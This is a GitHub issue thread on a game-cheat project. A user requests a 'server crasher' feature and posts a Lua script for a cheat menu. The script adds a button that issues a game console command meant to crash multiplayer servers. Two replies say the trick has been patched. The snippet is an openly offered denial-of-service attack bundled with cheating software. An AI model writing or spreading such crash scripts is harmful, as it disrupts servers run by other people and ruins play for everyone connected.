### ISSUE TITLE
add server crasher

### ISSUE THREAD

**Issue by ccsimplyspolit** [danielkrupinski/Osiris#505]
`
local references = {
    aimware = gui.Reference("MENU"),
};
local windowW, windowH = 200, 100;
local window = gui.Window("lynx_server_crasher" .. "tabs", "Server Crasher", 100, 150, windowW, windowH);
gui.Button(window, "Crash server", function()
    client.Command("survival_equip spawn_equip_healthshot", true);
end)

callbacks.Register("Draw", function()
    window:SetActive(references.aimware:IsActive());
end);
`

**Comment by effex1337** [comment]
Patched a few days ago.

**Comment by Evilhelder** [comment]
Patched...
